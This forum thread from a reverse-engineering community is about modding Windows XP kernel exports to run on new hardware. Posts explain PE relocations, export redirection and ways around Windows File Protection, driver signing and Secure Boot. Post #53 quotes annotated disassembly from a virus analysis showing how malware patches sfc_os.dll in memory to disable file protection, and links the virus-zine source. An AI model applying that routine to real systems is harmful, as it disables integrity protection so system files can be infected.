
Thread: XP on modern systems

  1. #46
    This is more of a whine than anything. I get asked, as do others, why I am wasting my time with XP, a question for which I have no reasonable answer. Does one need an answer? I have personal reasons but nothing major, my main OS is W7 and, again, the question is why? I'll give several reasons why, after an irritating experience with W10 over the past few days.

    I decided to upgrade my old laptop to the 19xx version of W10 from the 18xx version, and it has turned out to be a big mistake. Microsoft has screwed the boot partition on it. I d/l'd the W10 upgrade, waited as long for it to install, only to be told that W10 cannot be installed on my """USB""" drive. Excuse me??

    After taking 40 minutes to 'upgrade' windows "10", as they announced while doing it, at the end, I get this brilliant message: This PC Can't Run Windows 10. How can anyone be so blatantly stupid as to tell a user his system meets the standards for the upgrade, apparently upgrades the OS, then claims, "You can't install Windows on a USB flash drive using Setup".

    For cripes sake, this puts Microsoft programmers in the lower levels of the IQ scale. How can anyone possibly allow such a poorly written piece of software to be released??? It knew I had W10 ver 1806 on a hard drive and that the 18xx version was being upgraded. Then it tells me I am using a USB drive????

    But, why? why? why? does it refuse to allow the user to examine the installation? There is no option, once you acknowledge their idiocy, they cleanup the installation, apparently meaning they undo the upgrade. They finish with this brilliance: "Something went wrong". Duh!!!! After 40 minutes of downloading the upgrade followed by another 40 minutes of installing it, they claim: "Something went wrong".

    During its initialization, it managed to screw my boot sector. Microsoft can take its W10 and stick it in a dark place. It is more stable than XP, although XP fairly whizzes along with an i5 processor and a 300-series chipset. It is not more stable than W7, however, and I see no clear advantage to using the over-bloated W10.

    [/whine off].

    BTW, I have just been educated on the EFI BIOS, which Msoft has designed to prevent older systems like XP from being dual-booted with W10. Somehow, I managed to change my BIOS from the BCD-based system to the EFI system. Another big mistake. Now I am trying to find out how to change it back.

    At the moment, I am enjoying working in XP as much as anything. It has its limitations compared to W7 or W10 but it's fun. Isn't that the main thing?
    Last edited by WaxfordSqueers; February 8th, 2020 at 18:49.

  2. #47
    Maybe I changed OS too much:
    MS-DOS, 3.11, Windows 95, Windows 98, Windows 98 SE, ME, 2000, XP.
    Vista I did not have for a long time; it took MS years to make the necessary upgrades.
    Windows 7 was OK for me.

    Then on the web you see everyone's question is led to a Windows 10 installation (instead of 8 or 8.1 even).
    For every problem asked, every answer is "upgrade to Windows 10"; all other information either says that or is deleted.


    It's not that I didn't try Windows 10, or that it is a psychological problem that I don't like this OS.

    It's a rational choice over being a tablet, console, spyware, bugs and incompatible software.

    The recent taste of a new Windows 10 installation I made was equally bad; the software I wanted to use was cancelled (due to bugs) long before the right steps could even be taken.
    Then I did google around whether these problems are known, and yes, here and there there is information, so I tried some of it: installed some upgrades, some framework versions, some patches,
    and no, the software still didn't do the job,
    while in the meantime Windows 10 had secretly upgraded and tells me when to make the reboot (omg), and guess what, after the upgrade nothing changed either.
    Then some guy was (really) telling me that he uses YouTube and Google and that works for Windows 10 and it's superb, super good.
    I was like, omg, really, do I install Linux now? There YouTube and Google also work.
    And he was like, you just have to install Windows 10 and you get used to it and will like it over everything.

    Seems I will not move this time; maybe I got too old, maybe I no longer want to - I don't care.

    What I know for certain, and I confirmed that with the last try of installing Windows 10, is that this time I won't make the move.

  3. #48
    Quote Originally Posted by Elenil:
    ...while in time windows 10 had secretly upgraded and tells me when to make the reboot (omg) and guess what after the upgrade nothing changed either
    Getting back to the problem at hand, I have been studying the XP ntoskrnl using tools like cffexplorer, and I find it quite interesting to see how the exports are laid out inside. The code from each export seems to follow directly the code of the previous export and I see a location where they are all referenced, something like an import table.

    I have also noted that ntoskrnl and other system files seem to have a related encryption used to certify them. I noticed that some people have a means of re-certifying modded drivers and that's something I need to learn, not to do anything illegal but to stop them being rejected by the OS. I know that can be turned off within Windows but I'd like to learn how the certification process works.

    Keeping in mind that RCE is a reversing forum, I won't extend this debate about Microsoft other than to reply to Elenil's comment. I inserted my opinion partly out of frustration with Microsoft but that has a lot to do with why I am trying to modify XP to make it work on modern chipsets and processors. Therefore, it is related to reversing in a way, although not directly.

    The point made by Elenil, that Microsoft now controls the upgrade process almost completely, forcing users to use what they dictate is best for them, is a good point. I don't know if this is still the case but Microsoft was using a torrent approach to distributing W10 updates. In other words, they were using the hard drives on the computers of users with which to share the distribution. I had to turn that option off on mine and I'd better check to see if it's still the case. Since torrents are generally considered a system for sharing copyrighted software and goods, it seems hypocritical of Msoft to take advantage of a piracy network to distribute W10. Furthermore, they think nothing of forcing their way onto the hard drives of users without asking permission. They don't even think it's necessary to advise users of what they are doing.

    The reason they likely force the update is that the system has become automated to the point it is not possible to pick the desired updates. With W7, that became a major issue since Msoft was sneaking in questionable updates aimed at forcing users up to W10.

    In my last post I related an experience where I waited 40 minutes for an upgrade to install only to be advised at the end that 'Something went wrong'. They did not seem to think anything was going wrong as they merrily reported the progress. Something was obviously going right, till the end, when they suddenly saw my system as a USB device rather than a W10 installation. On the next reboot, I had to wait as they undid the update.

    I have since learned that the likely cause is corrupted upgrade software. It seems some updates scheduled for installation were never installed and that threw a wrench into the upgrade mechanism. Furthermore, when a Windows OS is upgraded from another Windows OS, or cloned from another OS, it gets marked in the registry as a portable system. It seems Msoft has concluded my system is not only portable, but that it is a USB drive.

    After 40 minutes of installing the update, it apparently had no idea what device it was installing to. After completing the installation to this phantom device it concluded it could not be done and discarded the installation. Furthermore, Msoft has been doing the same since Win 8 without figuring out what is wrong, not only for major upgrades, but ordinary upgrades as well. At least, they don't seem to have figured it out well enough for implementation in their most recent W10 update.

    Open source Win 7????

    https://forums.malwarebytes.com/topic/256167-microsoft-urged-open-source-windows-7-to-undo-past-wrongs/

  4. #49
    Taking Kayaker's advice re looking through RCE archives for information on working with exports to add functions from newer versions of Windows to earlier versions. Mine is dated 2005, or something like that, and I wonder if it extends beyond that.

    The best I could come up with is this RCE thread:

    http://www.woodmann.com/forum/showthread.php?15715-How-to-add-Function-to-Various-System-DLL/page2&highlight=ntoskrnl

    In the thread, someone is asking about adding functions to Windows, I think to "THE" kernel. However, Kayaker pointed to another link, apparently one provided by the person, and I took a look there. I emphasized "THE" kernel because the impression I got reading the thread below is that the debaters regard kernel32 as the kernel and not ntoskrnl. None of them really seemed to have a grasp of the Windows system structure as explained by Russinovich et al, and although my understanding is primitive I have read such authors and have a decent grasp of what is going on and why BSODs would happen if care was not taken to understand how the system works.

    Oddly enough, I used to have the same idea about k32 till I learned that k32's role is to interface user code with kernel code via ntdll.dll. Since I read a while back that ntoskrnl is the first system file called by the loader and that it calls hal.dll to setup the hardware, I got it that ntoskrnl is the man. It runs the system overall, not k32. Maybe I'm wrong.

    http://www.msfn.org/board/topic/175529-remodeling-windows-xp-kernel32/?page=5

    The impression I got was people debating the procedure with none of them clear on what is involved. I know the thread is titled Remodeling Windows XP Kernel32 and the aim is to give XP compatibility with newer versions. But why K32 itself and not ntoskrnl?

    It did give me an idea, however. Would it possibly be better to use a W7 or Vista kernel in XP and find a way to negate exports that are not required? Might be a lot more work. Might also be a horror show if the W7 kernel has been totally rewritten and all the ordinals have changed. Not easy being a reverser sometimes.

    Actually the best advice came from Aimless on page 1 of the RCE link above but it was generally about PE headers, code caves, etc. Kayaker did advise that not a lot was known about modifying ntoskrnl and it seems we are no further ahead than folks were at the 2nd link in 2016.

    I would like to approach this from more than a shotgun approach of inserting functions and hoping they work. I'd like to be able to trace through ntoskrnl and hal code to see how the exports are being implemented. For example, if memcpy is called by an app, how is the call fully implemented. How is memcpy reached in ntoskrnl...how is it found?

    Here's a hint from the PE Header:
    Code:
    Export Directory
    +00 DWORD   Characteristics;
    +04 DWORD   TimeDateStamp;
    +08 WORD    MajorVersion;
    +0a WORD    MinorVersion;
    +0c DWORD   Name;
    +10 DWORD   Base;
    +14 DWORD   NumberOfFunctions;
    +18 DWORD   NumberOfNames;
    +1c DWORD   *AddressOfFunctions;
    +20 DWORD   *AddressOfNames;
    +24 DWORD   *AddressOfNameOrdinals;
    I am still not clear on whether windbg can trace the code to that depth without setting a BP and I may have to fire up softice to do it.

    Some people are now modifying ntoskrnl and hal using different means but they are having limited success. I think that's because they are decompiling ntoskrnl and hal, adding functions, then recompiling. Not clear on how that works since I have yet to see a decompilation that is clean enough to recompile it. Apparently it is being done, I have seen the results.

    I am not too clear either on the subject of relocations. I have seen it explained in many places but they seem to talk about what a relocation does and not why it is done. I know that the image on disk is not the same as the image in memory, or the part of the RAM image stored temporarily in the pagefile. I would think that the code portion stored in the executable file would be stored consecutively in RAM from its base at 0x04000000 but I also know the image is not always stored at that address.

    Someone said something in an article that turned the light on. If you modify a file, by inserting code, then the remainder of the image needs to be relocated. However, that is not normally the case, so why would code need to be relocated as the disk image is moved to the RAM image? Is it a compiler issue wherein it is not known at compile time where certain code or data should be placed?

    Anyway, I am getting a better picture of what I need to do to add exports and I am leaning toward creating a new section rather than finding a code cave. I have actually done that 'once' for a reason that now escapes me, and it worked.
    Last edited by WaxfordSqueers; February 12th, 2020 at 16:52.

  5. #50
    For those who don't know about this:
    you can add a function name all the time,
    but the function code you also have to do;

    otherwise your added function doesn't have code, and that, guess what, doesn't work.

    You're right, with the PE header there is this information (normed).


    blackwingcat, who made the 2000 version, had a big advantage (the problem Wax is talking about, "limited success"):
    he has the released version of 2003 Server (which is basically XP).
    Unlike the Windows 2000 kernel extender, for the XP kernel extender the assembly code has to be read out
    and either transferred to a C++ variant or the assembly code fixed to work for this function.



    From the 2003 kernel version you have the C++ code from Microsoft; you can just compile the code
    and redirect the functions.
    Since it's from Microsoft itself, the functions work too.

    What this approach is doing is patching the export table at runtime (with more functions) (Wax posted the PE header norm)
    and redirecting it to a DLL that has been compiled with the functions.

    An executable (program, system driver) is searching, for example, ntoskrnl.exe for its exports;
    now it finds the "patched" redirected function, which leads to your module/DLL.

    Now the calling executable can use the "new function/s".


    The memcpy are the easy functions; they don't use internal functions.
    There are functions like that which can be copied without any issues, memcpy being one of those.
    A little bit harder it gets if this function is calling internal functions and you have to fix that together.
    The third version is the hardest: in those the function might not be present at all;
    then you have to write the entire function new for your OS, and if that uses internals that are not present in the OS, this is then getting more work.


    Yep, the problem with the relocs is not present if you use a module/DLL;
    the compiler does that for you then.
    The approach where you need that is when patching a static module, not using your own module where relocs are done by your compiler.

    If you just copy-paste a function without relocs, then on a static module the relocs are not done;
    the offset that is accessed without relocs is maybe not present (page fault).

    The image gets its own virtual memory address space; it used to be always 0x00400000
    for your file, where 0x00000000 is.
    The virtual address space may now start with 0x10000000 or something;
    then the file offset is still at 0x00000000.

    The idea behind this was simply that every program gets its own "address space".
    If you went a different approach, like executables a and b,
    where a starts at 0x00000000 and ends at 0x00100000, then b would start at 0x00100000
    and could access a, or a access b, in kernel mode that being the case.

    In protected mode (which is still very common) this is normed over GDT, PDBR, SEGMENT, virtual offsets (EIP), PTE, PDE (I could write more here but I'll leave it with those);
    they norm the physical address space.

    The compiler has to build up the executable, therefore the compiler is programmed to calculate the relocs;
    the other part is Windows (or an OS) that gives the relocs a second value, where the module was mapped at,
    thus those get the right offsets where the functions are.

    To my knowledge that isn't illegal.
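    Added illustration (Python, not code from this thread or from any kernel extender) of the reloc point made in the post above and asked about in #49: the linker bakes absolute addresses assuming the 0x00400000 base, the loader may map the image at 0x10000000, and every recorded fixup then gets the delta added; a function copied without its fixups keeps pointing at the old addresses. The x86 bytes, the image and the .reloc block are all constructed here.

```python
import struct

PREFERRED_BASE = 0x00400000         # image base the linker assumed (the usual 32-bit default)
IMAGE_REL_BASED_ABSOLUTE = 0        # padding entry, skipped by the loader
IMAGE_REL_BASED_HIGHLOW = 3         # 32-bit absolute address: add the full delta
CODE_RVA = 0x1000                   # where the constructed function lives inside the image

def build_code_and_relocs():
    """Construct a tiny x86 function holding two absolute 32-bit addresses, plus the
    IMAGE_BASE_RELOCATION block the linker would emit to record where they are."""
    data_va = PREFERRED_BASE + 0x3000                   # a global the function reads
    callee_va = PREFERRED_BASE + 0x1020                 # a function address it pushes
    code = (b"\xA1" + struct.pack("<I", data_va)        # mov eax, [data_va]   immediate at +1
            + b"\x68" + struct.pack("<I", callee_va)    # push callee_va        immediate at +6
            + b"\xC3")                                  # ret
    entries = [(IMAGE_REL_BASED_HIGHLOW << 12) | 1,     # type in the top 4 bits, page offset below
               (IMAGE_REL_BASED_HIGHLOW << 12) | 6]
    block = struct.pack("<II", CODE_RVA, 8 + 2 * len(entries)) + struct.pack("<2H", *entries)
    return code, block

def apply_relocations(image, reloc_table, actual_base, preferred_base=PREFERRED_BASE):
    """Loader-side fixup: walk each IMAGE_BASE_RELOCATION block and add
    (actual_base - preferred_base) to every HIGHLOW target. Returns fixups applied."""
    delta = (actual_base - preferred_base) & 0xFFFFFFFF
    if delta == 0:                                      # mapped at the preferred base: nothing to do
        return 0
    applied, pos = 0, 0
    while pos + 8 <= len(reloc_table):
        page_rva, block_size = struct.unpack_from("<II", reloc_table, pos)
        if block_size < 8:
            raise ValueError("malformed relocation block")
        for off in range(pos + 8, pos + block_size, 2):
            entry = struct.unpack_from("<H", reloc_table, off)[0]
            kind, offset = entry >> 12, entry & 0xFFF
            if kind == IMAGE_REL_BASED_ABSOLUTE:
                continue
            if kind != IMAGE_REL_BASED_HIGHLOW:
                raise ValueError(f"unsupported relocation type {kind}")
            at = page_rva + offset
            value = struct.unpack_from("<I", image, at)[0]
            struct.pack_into("<I", image, at, (value + delta) & 0xFFFFFFFF)
            applied += 1
        pos += block_size
    return applied

def absolute_refs(image):
    """Read back the two immediates: the addresses the code will actually touch when it runs."""
    return (struct.unpack_from("<I", image, CODE_RVA + 1)[0],
            struct.unpack_from("<I", image, CODE_RVA + 6)[0])

def points_into_image(addr, base, size):
    """Would this absolute address land inside the mapped image? If not, the access is the
    'offset maybe not present (page fault)' case from the post above."""
    return base <= addr < base + size

def demo(actual_base=0x10000000, image_size=0x4000):
    """Map the constructed image at `actual_base` and compare the references before
    and after the fixups. Returns (unrelocated refs, fixups applied, relocated refs)."""
    code, relocs = build_code_and_relocs()
    image = bytearray(image_size)
    image[CODE_RVA:CODE_RVA + len(code)] = code          # raw copy of the function, fixups not yet done
    unrelocated = absolute_refs(image)
    applied = apply_relocations(image, relocs, actual_base)
    return unrelocated, applied, absolute_refs(image)
```

    With the image mapped at 0x10000000 the unrelocated copy still references 0x00403000, which is outside the mapped range; after the two fixups it references 0x10003000.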

  6. #51
    Kayaker (Teach, Not Flame; joined Oct 2000; 4,128 posts; 5 blog entries)
    Has anyone brought up Windows File Protection (WFP) yet?

  7. #52
    @Elenil...I'll get back to you soon when I get a chance to digest your comments. Good stuff.

    @Kayaker...

    Quote Originally Posted by Kayaker:
    Has anyone brought up Windows File Protection (WFP) yet?
    I realize you likely know all this already. The way I have dealt with WFP at the XP and W7 level is to replace the file in the i386 cache before replacing it in the sys32 directory or wherever. Did that recently with a modded acpi.sys and when SFP is run, it replaces the modded file with the modded file.

    I would like to certify the file but I don't know how to do that yet. You need a .cat file but right now I have driver checks disabled. You can disable SFP as well I've heard. Probably not a good idea in the long term but it's handy when working with modded files.

    Another method I have used is replacing modded files in XP offline. I hot plug XP when W7 is running and SFP does not seem to bother with the replaced file. Don't know why.

  8. #53
    Kayaker (Teach, Not Flame; joined Oct 2000; 4,128 posts; 5 blog entries)
    Quote Originally Posted by WaxfordSqueers:
    The way I have dealt with WFP at the XP and W7 level is to replace the file in the i386 cache before replacing it in the sys32 directory or wherever. Did that recently with a modded acpi.sys and when SFP is run, it replaces the modded file with the modded file.
    Heheh, I kind of wondered if that would work.

    While there are more official ways of disabling WFP, there was an interesting trick by a virus I analyzed once, mentioned here

    http://www.woodmann.com/forum/entry.php?36-IDC-scripting-a-Win32-Virut-variant-Part-2

    This was a runtime patch so the vx could infect system files, but I was wondering if you could do the same thing by hard modifying sfc.os.dll
    Here's part of the post


    WFP is disabled by patching in a call to ExitThread immediately after a NtWaitForMultipleObjects call in an sfc.os.dll function called SfcWatchProtectedDirectoriesWorkerThread.
    The function name pretty much describes what it does, it's a worker thread which continually monitors for file changes from a protected dll list. After patching SfcWatchProtectedDirectoriesWorkerThread the virus calls SfcTerminateWatcherThread.

    Here is what the function looks like in code:

    Code:
    // The search pattern in sfc.os.dll

    :00403CE4          Pattern_SFC_OS_DLL:    ; DATA XREF: Disable_WFP+F
    :00403CE4 6A 01       push    1
    :00403CE6 6A 01       push    1
    :00403CE8 FF 33       push    dword ptr [ebx]
    :00403CEA FF 73 04    push    dword ptr [ebx+4]
    :00403CEA          ; -----------------------------------------------
                          // part of call ds:NtWaitForMultipleObjects
    :00403CED FF 15       dw 15FFh   
    
    
    
    :00403CEF Disable_WFP     proc near
    
    // EAX = base address of sfc.os.dll returned from GetModuleHandleA
    
    :00403CEF       test    eax, eax
    :00403CF1       jz      short locret_403CE3
    :00403CF3       push    0Bh
    :00403CF8       mov     edx, eax
    :00403CFA       pop     ebx
    :00403CFB       add     edx, [eax+IMAGE_DOS_HEADER.e_lfanew]
    :00403CFE       lea     esi, Pattern_SFC_OS_DLL
          
                            // SectionTable.PointerToRawData .text section
    :00403D04       mov     edi, [edx+10Ch]
                            // SectionTable.SizeOfRawData .text section
    :00403D0A       mov     ecx, [edx+108h]
           
    :00403D10       add     edi, eax
    :00403D12       sub     ecx, ebx
    :00403D14
    :00403D14 Find_Pattern:           ; CODE XREF: Disable_WFP+2E
    :00403D14       pusha
    :00403D15       mov     ecx, ebx
    :00403D17       repe cmpsb
    :00403D19       popa
    :00403D1A       jz      short loc_403D21
    :00403D1C       inc     edi
    :00403D1D       loop    Find_Pattern
    :00403D1F       jmp     short locret_403CE3
    :00403D21 ; ----------------------------------------------------
    :00403D21
    :00403D21 loc_403D21:             ; CODE XREF: Disable_WFP+2B
    :00403D21       add     edi, 0Fh
    :00403D24       push    edi
    :00403D25       mov     edx, esp
    :00403D27       push    ebx
    :00403D28       mov     ecx, esp
    :00403D2A       push    eax
    :00403D2B       push    esp             ; OldProtect
    :00403D2C       push    40h             ; Protect
    :00403D2E       push    ecx             ; RegionSize
    :00403D2F       push    edx             ; BaseAddress
    :00403D30       push    0FFFFFFFFh      ; hProcess
    :00403D32       call    NtProtectVirtualMemory
    :00403D38       add     esp, 0Ch
    :00403D3B       mov     edx, ExitThread
    :00403D41       sub     edx, edi
    :00403D43       sub     edx, 7
    
    // Patch in ExitThread call immediately after
    // NtWaitForMultipleObjects in sfc.os function
    // SfcWatchProtectedDirectoriesWorkerThread
    
    // patch in push eax opcodes (6A00) + Call near, relative opcode (E8)
    :00403D46       mov     dword ptr [edi], 0E8006Ah  
          
    // patch in ExitThread displacement
    :00403D4C       mov     [edi+3], edx
              
    :00403D4F       retn
    :00403D4F Disable_WFP     endp ;
    Once I figured out what the code was doing I was able to do a search and found that the entire routine for disabling WFP was ripped from here:

    Win2k.SFPDisable
    http://www.hackemate.com.ar/ezines/29a/29a-6/Articles/29A-6.001

    (link is dead but those 29A ezines should be around somewhere)

  9. #54
    Quote Originally Posted by Kayaker:
    Once I figured out what the code was doing I was able to do a search and found that the entire routine for disabling WFP was ripped from here:
    Here's the link from Wayback:

    https://web.archive.org/web/20080415111135/http://www.hackemate.com.ar/ezines/29a/29a-6/Articles/29A-6.001

    They seem, as you say, to be more interested in injecting a virus at the test eax, eax point rather than stopping SFC. Although I have no interest in viruses (or is it virii??) I'll read through it to get an idea of how the system is compromised.

    Perhaps I am being naive in generalizing my means of bypassing SFC, one would think the coders of Windows would have seen that coming. It is interesting that it can be bypassed so easily.

    The more urgent problem for me is the legitimacy checker for drivers. Drivers normally come with a .cat file, and those files are kept in windir\system32\catroot and ...\...\catroot2. Have no idea how they work but it seems there is an encryption process in place that verifies the authenticity of the drivers. Msoft has supplied a means of turning that off at boot time so you can test drivers.

    I am thinking that a modded kernel should be detected early on in the boot process but it seems folks are merely modding it with no issues. The main issue seems to be getting the CRC right in the PE Header. In a modern BIOS like the one with my 300-series chipset, they have a feature called Secure Boot which is designed to check the boot loader for authenticity. It is controversial, IMHO, because it can prevent an OS like Linux from loading and that is really none of Microsoft's business.

    It seems Linux manufacturers have to now apply to Microsoft for a bootloader signed by Msoft. I think that should be made illegal since the user owns the machine and its BIOS. BIOS manufacturers should not be designing the BIOS for Msoft so they can dictate how it is used.

    Anyway I have turned off Secure Boot in my machine but it is not a trivial matter of setting a switch to 'off'. You have to delete the encryption keys associated with the BIOS, hopefully after storing them for replacement.

  10. #55
    Quote Originally Posted by Elenil:
    from the 2003 kernel version you have the c++ code from microsoft you can just compile the code and redirect the functions since its from microsoft itself the functions work too

    what this approach is doing it patching the export table at runtime (with more functions) (wax posted the pe header norm)and redirect it to a dll that has been compiled with the functions
    Trying to grasp this. If you use the export table address in the PE header, you are directing apps to the dll you created, which contains functions to be added. What if the app needs an export that is in the exe/dll? I can't visualize how to do both without added code to the exe/dll to do the switch? Or creating an external patcher.

    I am looking at something simpler, although the idea of a dll to contain the required exports sounds good. I still need to look at ntoskrnl more closely to see how it implements a call from an app and directs it to the required export. I'd like to understand that process clearly.

    Quote Originally Posted by Elenil:
    a executable (program,system driver) is searching for example the ntoskrnl.exe for its exports now it finds the "patched" redirected function what leads to your module/dll
    How does 'patch' know which exports are in the external dll and which ones are currently in the exe/dll? If an app is looking for memcpy_s, which needs to be added to ntos, and it is in the external dll, how is it directed to the external dll. That dll would need an export table of its own, would it not? Or could you reference memcpy_s in ntos and direct it to the external dll with a call?

    Quote Originally Posted by Elenil:
    the memcpy are the easy functions they dont use internal functions
    That's interesting, I know some exports will call other functions and if that export is taken from a newer version of ntos there will have to be a means of providing the function required. I think that is a problem with ndis.sys where another system file is involved that is not available in XP.

    There is also the issue, I think Kayaker mentioned it, that some of the missing exports may not be required in XP. For example, if I want to get a W7 LAN driver going in XP, and it calls a function that is checking to see if there are multiple processors, I may be able to bypass that export. I know some of them are related to logging for Event viewer. I don't care about event logging although it may cause issues elsewhere.


    Quote Originally Posted by Elenil:
    if you just copy paste a function without relocs then on a static module the relocs are not done the offset that is accessed without relocs is maybe not present (page fault)
    I need to read more on relocs. Still not grasping the basics of why they are used. I have a good understanding of the virtual address space but I don't understand why an image on disk does not contain the required information to locate the proper address wrt the base address at 0x04000000 and why it needs to relocate certain addresses while loading the image.

  11. #56
    Quote Originally Posted by WaxfordSqueers:
    Trying to grasp this. If you use the export table address in the PE header, you are directing apps to the dll you created, which contains functions to be added. What if the app needs an export that is in the exe/dll? I can't visualize how to do both without added code to the exe/dll to do the switch? Or creating an external patcher.

    I am looking at something simpler, although the idea of a dll to contain the required exports sounds good. I still need to look at ntoskrnl more closely to see how it implements a call from an app and directs it to the required export. I'd like to understand that process clearly.

    How does 'patch' know which exports are in the external dll and which ones are currently in the exe/dll? If an app is looking for memcpy_s, which needs to be added to ntos, and it is in the external dll, how is it directed to the external dll. That dll would need an export table of its own, would it not? Or could you reference memcpy_s in ntos and direct it to the external dll with a call?

    That's interesting, I know some exports will call other functions and if that export is taken from a newer version of ntos there will have to be a means of providing the function required. I think that is a problem with ndis.sys where another system file is involved that is not available in XP.

    There is also the issue, I think Kayaker mentioned it, that some of the missing exports may not be required in XP. For example, if I want to get a W7 LAN driver going in XP, and it calls a function that is checking to see if there are multiple processors, I may be able to bypass that export. I know some of them are related to logging for Event viewer. I don't care about event logging although it may cause issues elsewhere.


    I need to read more on relocs. Still not grasping the basics of why they are used. I have a good understanding of the virtual address space but I don't understand why an image on disk does not contain the required information to locate the proper address wrt the base address at 0x04000000 and why it needs to relocate certain addresses while loading the image.
    windows is reading the PE header and its Export Table as the norm you posted
    it then write those addresses into the import module
    they are offsets of 32 bit size
    it doesnt matter if that is not inside the orginal dll (you can do that too but thats a different way)
    well the thing is if the export name is ntoskrnl the ntoskrnl is loaded in memory
    if your dll lets call it ntoskrnl_wrapper.dll got the other missing functions that dll also has to be loaded
    then you have 2 modules in your memory

    redirecting is pretty common even in windows win32k.sys for example do exactly that
    the patcher could be in dllmain()
    as soon this is done all other modules will read out the patched table
    how many export a module have you already posted in the PE export norm (number or ordinals)
    it does not need to know on what module they are on they are 32 bit offsets that can lead from 0x00000000 to 0xFFFFFFFF, ansi string names , count number (number of ordinals)
    offset where the export table begins (addressoffunctions(32 bit values), addressofnames(string), addressofnameordinals(number))
    memcpy being a name it will reconize that name in the list
    then the ordinal is known and then the 32 bit offset is known
    yes you add that name, runtime offset, and ordinal number
    thus the import module know where to call that function


    there are easy functions that can be copied (memcpy being one of those)
    a multiple processor check is present in xp, on windows 7 it partly uses the same functions so you have to write a function that reads out that value and fix maybe some parameters, thats all
    totally missing functions are harder to add only IF they use functions that are not present in your OS-Module

    those ndis functions certainly can be added but the question is what those functions use internally

    the windows CE version is a good target because the functions at this os are present in win2k or winxp, windows ce is a downgraded nt os
    it includes far less functions than xp does
    another reason is that it has to use present functions, that means they are present in xp


    the thing with the relocs is a very old cracking problem, remember reconstructing pe? imports, exports? functions?
    a lot of protectors mess up with that
    it's classical reverser's work

    BUT you dont need that for the dll method
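
The name -> ordinal -> 32 bit offset walk described in the post above, as an added example (not code from the thread): a small Python parser over a constructed export directory, including the forwarded ("redirected") case where an AddressOfFunctions entry points back inside the export directory. The image layout, the symbol names and the OTHER.strlen forwarder are all constructed for the demo, not taken from a real module.

```python
import struct

# IMAGE_EXPORT_DIRECTORY: 40 bytes, fields in on-disk order.
EXPORT_DIR = struct.Struct("<IIHHIIIIIII")

def resolve_export(image, dir_rva, dir_size, name):
    """Resolve an export by name the way the loader does. image is the
    mapped module (RVA == offset). Returns (ordinal, rva, forwarder);
    forwarder is 'DLL.Func' when the entry points back into the directory."""
    (_, _, _, _, _, base, n_funcs, n_names,
     aof, aon, aono) = EXPORT_DIR.unpack_from(image, dir_rva)
    for i in range(n_names):
        name_rva, = struct.unpack_from("<I", image, aon + 4 * i)
        if image[name_rva:image.index(b"\0", name_rva)] != name.encode():
            continue
        # AddressOfNameOrdinals holds unbiased indices into AddressOfFunctions
        idx, = struct.unpack_from("<H", image, aono + 2 * i)
        if idx >= n_funcs:
            raise ValueError("ordinal index out of range")
        rva, = struct.unpack_from("<I", image, aof + 4 * idx)
        fwd = None
        if dir_rva <= rva < dir_rva + dir_size:  # forwarded ("redirected")
            fwd = image[rva:image.index(b"\0", rva)].decode("ascii")
        return base + idx, rva, fwd
    return None

def build_sample_image():
    """Constructed stand-in for a mapped module (not a real DLL): only the
    export directory is filled; strlen is forwarded to a made-up OTHER.dll."""
    img = bytearray(0x400)
    dir_rva, dir_size = 0x100, 0x100
    aof, aon, aono, names, fwd = 0x140, 0x160, 0x180, 0x1A0, 0x1E0
    img[fwd:fwd + 13] = b"OTHER.strlen\0"
    entries = [("memcpy", 0x1000), ("memset", 0x2000), ("strlen", fwd)]
    pos = names
    for i, (sym, rva) in enumerate(entries):  # name table kept sorted
        struct.pack_into("<I", img, aof + 4 * i, rva)
        struct.pack_into("<I", img, aon + 4 * i, pos)
        struct.pack_into("<H", img, aono + 2 * i, i)
        img[pos:pos + len(sym) + 1] = sym.encode() + b"\0"
        pos += len(sym) + 1
    EXPORT_DIR.pack_into(img, dir_rva, 0, 0, 0, 0, 0, 1,
                         len(entries), len(entries), aof, aon, aono)
    return bytes(img), dir_rva, dir_size

if __name__ == "__main__":
    img, rva, size = build_sample_image()
    for sym in ("memcpy", "strlen", "memmove"):
        print(sym, resolve_export(img, rva, size, sym))
```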

  12. #57
    Quote Originally Posted by Elenil View Post
    those ndis functions certainly can be added but the question is what those functions use internally ...the windows CE version is a good target because the functions at this os are present in win2k or winxp, windows ce is a downgraded nt os, it includes far less functions than xp does, another reason is that it has to use present functions, that means they are present in xp
    I have been keeping the CE option in mind since you mentioned it a while back. The only issue I have is that I use the Intel native LAN drivers on the other end and the Ethernet Controller on my B360 chipset is a 1219-V, which would have no trouble talking to the controller on the other end since it is Intel as well. Both have fairly advanced Ethernet options and I fear the CE driver may not be up to meeting all the requirements. Also, if you look in the INF file for the Ethernet controller, it has many sections for different forms of the controller, all with model specific parameters. Mine, the 1219-V, is listed as (7).

    Problems arise when I try to run the Ethernet connection at 1 gigabyte. If there are issues, it drops back to about 100 Mhz and that's dead slow for transferring large files. My desktop wireless connection also depends on the Ethernet connection. I don't know if the CE driver would create headaches in that respect.

    Trying to keep in mind that I won't be using XP that much on a network, but at present, I am transferring all files to XP using a USB thumb drive. I have managed to establish a basic wireless connection for Internet using a Cisco USB device and I can download required files using Internet Explorer 8.

    I would like to eventually establish a serial connection so I can run windbg remotely in k-mode but I don't know if my serial port is operational. I do need an SMBus driver, but that's another issue. Then, of course, I'd like to look into getting softice operational for 32-bit. I am thinking about firing it up in a VM just to look at how apps call the exports in ntoskrnl. Last time I tried with windbg, it got to a SYSENTER and jumped right over it and out the back end. I could not get it to single-step into the SYSENTER as I have done with sice many a time.

    Of course, I could try BPs, but I want to see exactly what a call to something like memcpy does in the kernel, tracing it from the call in the app right into the kernel.

  13. #58
    Since Windows 10 has compatibility modes for Windows versions back to W95, I wonder if there is a way to use that in reverse to make earlier versions compatible with newer versions.

    Compatibility is done with 'shims', which is code used to redirect older apps to code that will work for them. Since the W10 kernel is 2.5 times the size of the W7 kernel and about 4x the size of the XP kernel, I wonder if the size difference is in part due to the required shims for compatibility? Maybe there is shim code out there that could be used as a template.

    https://techcommunity.microsoft.com/t5/ask-the-performance-team/demystifying-shims-or-using-the-app-compat-toolkit-to-make-your/ba-p/374947

  14. #59
    Kayaker

  15. #60
    Quote Originally Posted by Kayaker View Post
    Using shims is an interesting idea.
    Thanks for the links, Kayaker. Interesting stuff and a lot to digest.

    Obviously, the idea of shims is related to backward compatibility, but Ionescu's article, or talk, claims shims can be used on devices and drivers like ndis.sys. Maybe if shims were used in W7 to make XP compatible with W7, the code might reveal how to go about it more efficiently, making it easier to implement W7 ndis.sys in XP. Then again, you can over-think things. Sometimes it's better to just do it the old way.
